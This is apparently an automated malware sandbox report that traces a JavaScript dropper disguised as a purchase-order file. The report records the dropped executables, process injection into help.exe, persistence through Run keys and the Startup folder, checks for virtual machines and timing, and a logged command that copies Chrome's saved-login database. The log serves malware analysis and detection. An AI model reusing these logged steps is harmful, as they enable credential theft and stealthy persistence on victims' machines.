Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299780 NtMapViewOfSection, 18_2_01299780
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299610 NtEnumerateValueKey, 18_2_01299610
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299670 NtQueryInformationProcess, 18_2_01299670
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_01299650 NtQueryValueKey, 18_2_01299650
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012996D0 NtCreateKey, 18_2_012996D0
Source: bin.exe.0.dr Static PE information: No import functions for PE file found
Source: u8g48fg0phzxan.exe.3.dr Static PE information: No import functions for PE file found
Source: u8g48fg0phzxan.exe0.3.dr Static PE information: No import functions for PE file found
Source: CIQ-PO162688.js Initial sample: Strings found which are bigger than 50
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe AD408337CE7D70D527D6A9044B1095B7F8149BB63139B0C5F2003E6D55305341
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Irlr8ftbp\u8g48fg0phzxan.exe AD408337CE7D70D527D6A9044B1095B7F8149BB63139B0C5F2003E6D55305341
Source: bin.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: u8g48fg0phzxan.exe.3.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: u8g48fg0phzxan.exe0.3.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: bin.exe.0.dr Static PE information: Section .text
Source: u8g48fg0phzxan.exe.3.dr Static PE information: Section .text
Source: u8g48fg0phzxan.exe0.3.dr Static PE information: Section .text
Source: CIQ-PO162688.js Virustotal: Detection: 25%
Source: CIQ-PO162688.js ReversingLabs: Detection: 15%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\CIQ-PO162688.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\RmiIjXZkdd.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\RmiIjXZkdd.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RmiIjXZkdd.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\RmiIjXZkdd.js
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\bin.exe
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winJS@19/7@54/13
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1860:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_01
Source: C:\Windows\explorer.exe File created: C:\Program Files (x86)\Irlr8ftbp
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities
Source: Binary string: wntdll.pdbUGP source: bin.exe, 00000002.00000003.399769173.0000000000A4E000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.508084202.0000000000CFF000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.396510235.00000000008A3000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.506615779.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000002.908149328.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000002.924263331.0000000000CFF000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000003.505879582.00000000008A7000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000003.508010776.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, 00000012.00000003.873844239.0000000000D5D000.00000004.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, 00000012.00000002.882662944.000000000134F000.00000040.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, 00000012.00000002.876169224.0000000001230000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: bin.exe, bin.exe, 00000002.00000003.399769173.0000000000A4E000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.508084202.0000000000CFF000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.396510235.00000000008A3000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.506615779.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, help.exe, help.exe, 00000009.00000002.908149328.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000002.924263331.0000000000CFF000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000003.505879582.00000000008A7000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000009.00000003.508010776.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, u8g48fg0phzxan.exe, 00000012.00000003.873844239.0000000000D5D000.00000004.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, 00000012.00000002.882662944.000000000134F000.00000040.00000800.00020000.00000000.sdmp, u8g48fg0phzxan.exe, 00000012.00000002.876169224.0000000001230000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: help.pdbGCTL source: bin.exe, 00000002.00000002.509585794.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: help.pdb source: bin.exe, 00000002.00000002.509585794.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C5D0D1 push ecx; ret 2_2_00C5D0E4
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_00C5D0D1 push ecx; ret 9_2_00C5D0E4
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004BC928 push cs; retf 9_2_004BC935
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004B492D push eax; ret 9_2_004B492E
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004C72B3 push eax; retf 9_2_004C72B4
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CEB3B push dword ptr [7D52CE57h]; ret 9_2_004CEB5E
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CD67B push eax; ret 9_2_004CD6E2
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CD672 push eax; ret 9_2_004CD678
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CD625 push eax; ret 9_2_004CD678
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004CD6DC push eax; ret 9_2_004CD6E2
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0120C928 push cs; retf 18_2_0120C935
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0120492D push eax; ret 18_2_0120492E
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121EB3B push dword ptr [7D52CE57h]; ret 18_2_0121EB5E
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012172B3 push eax; retf 18_2_012172B4
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121D625 push eax; ret 18_2_0121D678
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121D672 push eax; ret 18_2_0121D678
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121D67B push eax; ret 18_2_0121D6E2
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_0121D6DC push eax; ret 18_2_0121D6E2
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Code function: 18_2_012AD0D1 push ecx; ret 18_2_012AD0E4
Source: CIQ-PO162688.js String : entropy: 5.58, length: 340222, content: 'dHJ5ewp2YXIgbG9uZ1RleHQxID0gI>@ZpZ2hRWEp5WVhrdWNISnZkRzkwZVhCbExtWnZja1ZoWTJnZ1B5QkJjbkpoZVM1d2NtOT
Source: initial sample Static PE information: section name: .text entropy: 7.27935568792
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\bin.exe
Source: C:\Windows\explorer.exe File created: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Irlr8ftbp\u8g48fg0phzxan.exe

Boot Survival

Source: C:\Windows\SysWOW64\help.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ZLPXAJ4HOH
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RmiIjXZkdd.js
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Users\user\AppData\Local\Temp\bin.exe RDTSC instruction interceptor: First address: 0000000000FC8C04 second address: 0000000000FC8C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bin.exe RDTSC instruction interceptor: First address: 0000000000FC8F9E second address: 0000000000FC8FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 00000000004B8C04 second address: 00000000004B8C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 00000000004B8F9E second address: 00000000004B8FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe RDTSC instruction interceptor: First address: 0000000001208C04 second address: 0000000001208C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe RDTSC instruction interceptor: First address: 0000000001208F9E second address: 0000000001208FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\explorer.exe TID: 5504 Thread sleep time: -70000s >= -30000s
Source: C:\Windows\SysWOW64\help.exe TID: 5936 Thread sleep count: 40 > 30
Source: C:\Windows\SysWOW64\help.exe TID: 5936 Thread sleep time: -80000s >= -30000s
Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C46DE6 rdtsc 2_2_00C46DE6
Source: C:\Users\user\AppData\Local\Temp\bin.exe API coverage: 6.1 %
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe API coverage: 2.3 %
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004C1660 FindFirstFileW,FindNextFileW,FindClose, 9_2_004C1660
Source: C:\Windows\SysWOW64\help.exe Code function: 9_2_004C1659 FindFirstFileW,FindNextFileW,FindClose, 9_2_004C1659
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: wscript.exe, 00000004.00000002.928037378.0000014D0BB20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpl
Source: explorer.exe, 00000003.00000000.450562950.0000000007FBD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.450562950.0000000007FBD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}d
Source: explorer.exe, 00000003.00000000.450731123.000000000807B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: wscript.exe, 00000008.00000002.931546751.0000020FBE910000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: explorer.exe, 00000003.00000000.450731123.000000000807B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000I
Source: wscript.exe, 00000001.00000002.908099402.0000022182291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.928103239.0000014D0BB83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.549886529.0000014D0BB83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.856423379.0000014D0BB83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.882649285.0000026A5198D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.716410093.0000026A5198D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.883116107.0000026A519F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.715463663.0000026A519F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.926117959.0000026A51983000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.882795550.0000026A519F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.926213528.0000026A519F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000000.450731123.000000000807B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.451429720.0000000008277000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.405102781.00000000042EE000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q^
Source: wscript.exe, 00000001.00000002.907994191.0000022182230000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: explorer.exe, 00000003.00000000.441137701.00000000042A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000O
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C46DE6 rdtsc 2_2_00C46DE6
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\help.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C9B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00C9B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C9B8D0 mov ecx, dword ptr fs:[00000030h] 2_2_00C9B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C9B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00C9B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD8CD6 mov eax, dword ptr fs:[00000030h] 2_2_00CD8CD6
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C058EC mov eax, dword ptr fs:[00000030h] 2_2_00C058EC
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CC14FB mov eax, dword ptr fs:[00000030h] 2_2_00CC14FB
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C86CF0 mov eax, dword ptr fs:[00000030h] 2_2_00C86CF0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C09080 mov eax, dword ptr fs:[00000030h] 2_2_00C09080
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C83884 mov eax, dword ptr fs:[00000030h] 2_2_00C83884
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C1849B mov eax, dword ptr fs:[00000030h] 2_2_00C1849B
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C320A0 mov eax, dword ptr fs:[00000030h] 2_2_00C320A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C490AF mov eax, dword ptr fs:[00000030h] 2_2_00C490AF
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3F0BF mov ecx, dword ptr fs:[00000030h] 2_2_00C3F0BF
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3F0BF mov eax, dword ptr fs:[00000030h] 2_2_00C3F0BF
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3A44B mov eax, dword ptr fs:[00000030h] 2_2_00C3A44B
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C20050 mov eax, dword ptr fs:[00000030h] 2_2_00C20050
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C9C450 mov eax, dword ptr fs:[00000030h] 2_2_00C9C450
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C2746D mov eax, dword ptr fs:[00000030h] 2_2_00C2746D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD1074 mov eax, dword ptr fs:[00000030h] 2_2_00CD1074
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CC2073 mov eax, dword ptr fs:[00000030h] 2_2_00CC2073
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD740D mov eax, dword ptr fs:[00000030h] 2_2_00CD740D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C86C0A mov eax, dword ptr fs:[00000030h] 2_2_00C86C0A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CC1C06 mov eax, dword ptr fs:[00000030h] 2_2_00CC1C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD4015 mov eax, dword ptr fs:[00000030h] 2_2_00CD4015
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C87016 mov eax, dword ptr fs:[00000030h] 2_2_00C87016
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C1B02A mov eax, dword ptr fs:[00000030h] 2_2_00C1B02A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3002D mov eax, dword ptr fs:[00000030h] 2_2_00C3002D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3BC2C mov eax, dword ptr fs:[00000030h] 2_2_00C3BC2C
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C86DC9 mov eax, dword ptr fs:[00000030h] 2_2_00C86DC9
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C86DC9 mov ecx, dword ptr fs:[00000030h] 2_2_00C86DC9
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C86DC9 mov eax, dword ptr fs:[00000030h] 2_2_00C86DC9
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C0B1E1 mov eax, dword ptr fs:[00000030h] 2_2_00C0B1E1
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C941E8 mov eax, dword ptr fs:[00000030h] 2_2_00C941E8
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C1D5E0 mov eax, dword ptr fs:[00000030h] 2_2_00C1D5E0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CCFDE2 mov eax, dword ptr fs:[00000030h] 2_2_00CCFDE2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CB8DF1 mov eax, dword ptr fs:[00000030h] 2_2_00CB8DF1
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C2C182 mov eax, dword ptr fs:[00000030h] 2_2_00C2C182
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C32581 mov eax, dword ptr fs:[00000030h] 2_2_00C32581
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3A185 mov eax, dword ptr fs:[00000030h] 2_2_00C3A185
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C02D8A mov eax, dword ptr fs:[00000030h] 2_2_00C02D8A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C02D8A mov eax, dword ptr fs:[00000030h] 2_2_00C02D8A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C32990 mov eax, dword ptr fs:[00000030h] 2_2_00C32990
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3FD9B mov eax, dword ptr fs:[00000030h] 2_2_00C3FD9B
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C3FD9B mov eax, dword ptr fs:[00000030h] 2_2_00C3FD9B
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD05AC mov eax, dword ptr fs:[00000030h] 2_2_00CD05AC
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00CD05AC mov eax, dword ptr fs:[00000030h] 2_2_00CD05AC
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C335A1 mov eax, dword ptr fs:[00000030h] 2_2_00C335A1
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C361A0 mov eax, dword ptr fs:[00000030h] 2_2_00C361A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C361A0 mov eax, dword ptr fs:[00000030h] 2_2_00C361A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C869A6 mov eax, dword ptr fs:[00000030h] 2_2_00C869A6
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C31DB5 mov eax, dword ptr fs:[00000030h] 2_2_00C31DB5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C31DB5 mov eax, dword ptr fs:[00000030h] 2_2_00C31DB5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C31DB5 mov eax, dword ptr fs:[00000030h] 2_2_00C31DB5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C851BE mov eax, dword ptr fs:[00000030h] 2_2_00C851BE
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C851BE mov eax, dword ptr fs:[00000030h] 2_2_00C851BE
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C851BE mov eax, dword ptr fs:[00000030h] 2_2_00C851BE
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C851BE mov eax, dword ptr fs:[00000030h] 2_2_00C851BE
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C2B944 mov eax, dword ptr fs:[00000030h] 2_2_00C2B944
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C2B944 mov eax, dword ptr fs:[00000030h] 2_2_00C2B944
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C43D43 mov eax, dword ptr fs:[00000030h] 2_2_00C43D43
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C83540 mov eax, dword ptr fs:[00000030h] 2_2_00C83540
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C27D50 mov eax, dword ptr fs:[00000030h] 2_2_00C27D50
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C0C962 mov eax, dword ptr fs:[00000030h] 2_2_00C0C962
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C0B171 mov eax, dword ptr fs:[00000030h] 2_2_00C0B171
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C0B171 mov eax, dword ptr fs:[00000030h] 2_2_00C0B171
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C2C577 mov eax, dword ptr fs:[00000030h] 2_2_00C2C577
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C2C577 mov eax, dword ptr fs:[00000030h] 2_2_00C2C577
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C09100 mov eax, dword ptr fs:[00000030h] 2_2_00C09100
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C09100 mov eax, dword ptr fs:[00000030h] 2_2_00C09100
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C09100 mov eax, dword ptr fs:[00000030h] 2_2_00C09100
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C24120 mov eax, dword ptr fs:[00000030h] 2_2_00C24120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_00C24120 mov eax, dword ptr fs:[00000030h] 2_2_00C24120
